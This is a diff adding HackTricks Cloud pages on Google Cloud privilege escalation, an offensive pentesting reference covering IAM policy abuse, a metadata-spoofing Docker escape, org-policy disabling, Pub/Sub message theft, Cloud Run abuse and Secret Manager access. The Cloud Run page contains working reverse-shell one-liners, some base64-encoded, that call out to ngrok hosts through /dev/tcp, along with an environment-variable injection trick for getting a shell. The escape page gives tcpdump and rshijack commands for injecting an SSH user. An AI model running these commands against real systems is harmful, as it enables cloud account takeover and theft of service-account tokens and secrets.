+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md
new file mode 100644
index 0000000000..05cf0eeb1b
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md
@@ -0,0 +1,51 @@
+# GCP - Generic Permissions Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Generic Interesting Permissions
+
+### \*.setIamPolicy
+
+If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give you more privileges over it.\
+This permission can also allow to **escalate to other principals** if the resource allow to execute code and the iam.ServiceAccounts.actAs is not necessary.
+
+* _cloudfunctions.functions.setIamPolicy_
+  * Modify the policy of a Cloud Function to allow yourself to invoke it.
+
+There are tens of resources types with this kind of permission, you can find all of them in [https://cloud.google.com/iam/docs/permissions-reference](https://cloud.google.com/iam/docs/permissions-reference) searching for setIamPolicy.
+
+### \*.create, \*.update
+
+These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating a new one**. These can of permissions are specially useful if you also has the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account.
+
+### \*ServiceAccount\*
+
+This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md
new file mode 100644
index 0000000000..5d99557d8c
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md
@@ -0,0 +1,82 @@
+# GCP - Network Docker Escape
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Initial State
+
+In both writeups where this technique is specified, the attackers managed to get **root** access inside a **Docker** container managed by GCP with access to the host network (and the capabilities **`CAP_NET_ADMIN`** and **`CAP_NET_RAW`**).
+
+## Attack Explanation
+
+On a Google Compute Engine instance, regular inspection of network traffic reveals numerous **plain HTTP requests** to the **metadata instance** at `169.254.169.254`. The [**Google Guest Agent**](https://github.com/GoogleCloudPlatform/guest-agent), an open-source service, frequently makes such requests.
+
+This agent is designed to **monitor changes in the metadata**. Notably, the metadata includes a **field for SSH public keys**. When a new public SSH key is added to the metadata, the agent automatically **authorizes** it in the `.authorized_key` file. It may also **create a new user** and add them to **sudoers** if needed.
+
+The agent monitors changes by sending a request to **retrieve all metadata values recursively** (`GET /computeMetadata/v1/?recursive=true`). This request is designed to prompt the metadata server to send a response only if there's any change in the metadata since the last retrieval, identified by an Etag (`wait_for_change=true&last_etag=`). Additionally, a **timeout** parameter (`timeout_sec=`) is included. If no change occurs within the specified timeout, the server responds with the **unchanged values**.
+
+This process allows the **IMDS** (Instance Metadata Service) to respond after **60 seconds** if no configuration change has occurred, creating a potential **window for injecting a fake configuration response** to the guest agent.
+
+An attacker could exploit this by performing a **Man-in-the-Middle (MitM) attack**, spoofing the response from the IMDS server and **inserting a new public key**. This could enable unauthorized SSH access to the host.
+
+### Escape Technique
+
+While ARP spoofing is ineffective on Google Compute Engine networks, a [**modified version of rshijack**](https://github.com/ezequielpereira/rshijack) developed by [**Ezequiel**](https://www.ezequiel.tech/2020/08/dropping-shell-in.html) can be used for packet injection in the communication to inject the SSH user.
+
+This version of rshijack allows inputting the ACK and SEQ numbers as command-line arguments, facilitating the spoofing of a response before the real Metadata server response. Additionally, a [**small Shell script**](https://gist.github.com/ezequielpereira/914c2aae463409e785071213b059f96c#file-fakedata-sh) is used to return a **specially crafted payload**. This payload triggers the Google Guest Agent to **create a user `wouter`** with a specified public key in the `.authorized_keys` file.
+
+The script uses the same ETag to prevent the Metadata server from immediately notifying the Google Guest Agent of different metadata values, thereby delaying the response.
+
+To execute the spoofing, the following steps are necessary:
+
+1. **Monitor requests to the Metadata server** using **tcpdump**:
+
+```bash
+tcpdump -S -i eth0 'host 169.254.169.254 and port 80' &
+```
+
+Look for a line similar to:
+
+```
+<TIME> IP <LOCAL_IP>.<PORT> > 169.254.169.254.80: Flags [P.], seq <NUM>:<TARGET_ACK>, ack <TARGET_SEQ>, win <NUM>, length <NUM>: HTTP: GET /computeMetadata/v1/?timeout_sec=<SECONDS>&last_etag=<ETAG>&alt=json&recursive=True&wait_for_change=True HTTP/1.1
+```
+
+2. Send the fake metadata data with the correct ETAG to rshijack:
+
+```bash
+fakeData.sh <ETAG> | rshijack -q eth0 169.254.169.254:80 <LOCAL_IP>:<PORT> <TARGET_SEQ> <TARGET_ACK>; ssh -i id_rsa -o StrictHostKeyChecking=no wouter@localhost
+```
+
+This step authorizes the public key, enabling SSH connection with the corresponding private key.
+
+## References
+
+* [https://www.ezequiel.tech/2020/08/dropping-shell-in.html](https://www.ezequiel.tech/2020/08/dropping-shell-in.html)
+* [https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md
new file mode 100644
index 0000000000..60059cf64c
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md
@@ -0,0 +1,53 @@
+# GCP - Orgpolicy Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## orgpolicy
+
+### `orgpolicy.policy.set`
+
+An attacker leveraging **orgpolicy.policy.set** can manipulate organizational policies, which will allow him to remove certain restrictions impeding specific operations. For instance, the constraint **appengine.disableCodeDownload** usually blocks downloading of App Engine source code. However, by using **orgpolicy.policy.set**, an attacker can deactivate this constraint, thereby gaining access to download the source code, despite it initially being protected.
+
+{% code overflow="wrap" %}
+```bash
+# Get info
+gcloud resource-manager org-policies describe <org-policy> [--folder <id> | --organization <id> | --project <id>]
+
+# Disable
+gcloud resource-manager org-policies disable-enforce <org-policy> [--folder <id> | --organization <id> | --project <id>]
+```
+{% endcode %}
+
+A python script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).
+
+## References
+
+* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md
new file mode 100644
index 0000000000..dbddd51d6a
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md
@@ -0,0 +1,63 @@
+# GCP - Pubsub Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## PubSub
+
+Get more information in:
+
+{% content-ref url="../gcp-services/gcp-pub-sub.md" %}
+[gcp-pub-sub.md](../gcp-services/gcp-pub-sub.md)
+{% endcontent-ref %}
+
+### `pubsub.snapshots.create`
+
+The snapshots of topics **contain the current unACKed messages and every message after it**. You could create a snapshot of a topic to **access all the messages**, **avoiding access the topic directly**.
+
+### **`pubsub.snapshots.setIamPolicy`**
+
+Assign the pervious permissions to you.
+
+### `pubsub.subscriptions.create`
+
+You can create a push subscription in a topic that will be sending all the received messages to the indicated URL
+
+### **`pubsub.subscriptions.update`**
+
+Set your own URL as push endpoint to steal the messages.
+
+### `pubsub.subscriptions.consume`
+
+Access messages using the subscription.
+
+### `pubsub.subscriptions.setIamPolicy`
+
+Give yourself any of the preiovus permissions
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md
new file mode 100644
index 0000000000..2d4dea5a5b
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md
@@ -0,0 +1,45 @@
+# GCP - Resourcemanager Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## resourcemanager
+
+### `resourcemanager.organizations.setIamPolicy`
+
+Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example.
+
+### `resourcemanager.folders.setIamPolicy`
+
+Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example.
+
+### `resourcemanager.projects.setIamPolicy`
+
+Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
new file mode 100644
index 0000000000..4d01c56b0a
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
@@ -0,0 +1,117 @@
+# GCP - Run Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Run
+
+For more information about Cloud Run check:
+
+{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %}
+[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md)
+{% endcontent-ref %}
+
+### `run.services.create` , `iam.serviceAccounts.actAs`, **`run.routes.invoke`**
+
+An attacker with these permissions to **create a run service running arbitrary code** (arbitrary Docker container), attach a Service Account to it, and make the code **exfiltrate the Service Account token from the metadata**.
+
+An exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/run.services.create.py) and the Docker image can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudRunDockerImage).
+
+Note that when using `gcloud run deploy` instead of just creating the service **it needs the `update` permission**. Check an [**example here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/o-run.services.create.sh).
+
+### `run.services.update` , `iam.serviceAccounts.actAs`
+
+Like the previous one but updating a service:
+
+```bash
+# Launch some web server to listen in port 80 so the service works
+echo "python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1" | base64
+# cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg==
+
+gcloud run deploy hacked \
+--image=ubuntu:22.04 \  # Make sure to use an ubuntu version that includes python3
+--command=bash \
+--args="-c,echo cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== | base64 -d | bash" \
+--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
+--region=us-central1 \
+--allow-unauthenticated
+
+# If you don't have permissions to use "--allow-unauthenticated", dont use it
+```
+
+### `run.services.setIamPolicy`
+
+Give yourself previous permissions over cloud Run.
+
+### `run.jobs.create`, `run.jobs.run`, `iam.serviceaccounts.actAs`,(`run.jobs.get`)
+
+Launch a job with a reverse shell to steal the service account indicated in the command. You can find an [**exploit here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/m-run.jobs.create.sh).
+
+```bash
+gcloud beta run jobs create jab-cloudrun-3326 \
+--image=ubuntu:latest \
+--command=bash \
+--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNC50Y3AuZXUubmdyb2suaW8vMTIxMzIgMD4mMQ== | base64 -d | bash" \
+--service-account="<sa>@$PROJECT_ID.iam.gserviceaccount.com" \
+--region=us-central1
+
+```
+
+### `run.jobs.update`,`run.jobs.run`,`iam.serviceaccounts.actAs`,(`run.jobs.get`)
+
+Similar to the previous one it's possible to **update a job and update the SA**, the **command** and **execute it**:
+
+```bash
+gcloud beta run jobs update hacked \
+--image=mubuntu:latest \
+--command=bash \
+--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
+--service-account=<proj-num>-compute@developer.gserviceaccount.com \
+--region=us-central1 \
+--execute-now
+```
+
+### `run.jobs.setIamPolicy`
+
+Give yourself the previous permissions over Cloud Jobs.
+
+### `run.jobs.run`, `run.jobs.runWithOverrides`, (`run.jobs.get`)
+
+Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata:
+
+{% code overflow="wrap" %}
+```bash
+gcloud beta run jobs execute job-name --region <region> --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s"
+```
+{% endcode %}
+
+## References
+
+* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md
new file mode 100644
index 0000000000..9f5c5a7d18
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md
@@ -0,0 +1,64 @@
+# GCP - Secretmanager Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## secretmanager
+
+For more information about secretmanager:
+
+{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %}
+[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md)
+{% endcontent-ref %}
+
+### `secretmanager.versions.access`
+
+This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):
+
+```bash
+# Get clear-text of version 1 of secret: "<secret name>"
+gcloud secrets versions access 1 --secret="<secret_name>"
+```
+
+As this is also a post exploitation technique it can be found in:
+
+{% content-ref url="../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md" %}
+[gcp-secretmanager-post-exploitation.md](../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md)
+{% endcontent-ref %}
+
+### `secretmanager.secrets.setIamPolicy`
+
+This give you access to give you access to read the secrets from the secret manager, like using:
+
+```bash
+gcloud secrets add-iam-policy-binding <scret-name> \
+  --member="serviceAccount:<sa-name>@$PROJECT_ID.iam.gserviceaccount.com" \
+  --role="roles/secretmanager.secretAccessor"
+```
+
+{% hint style="success" %}
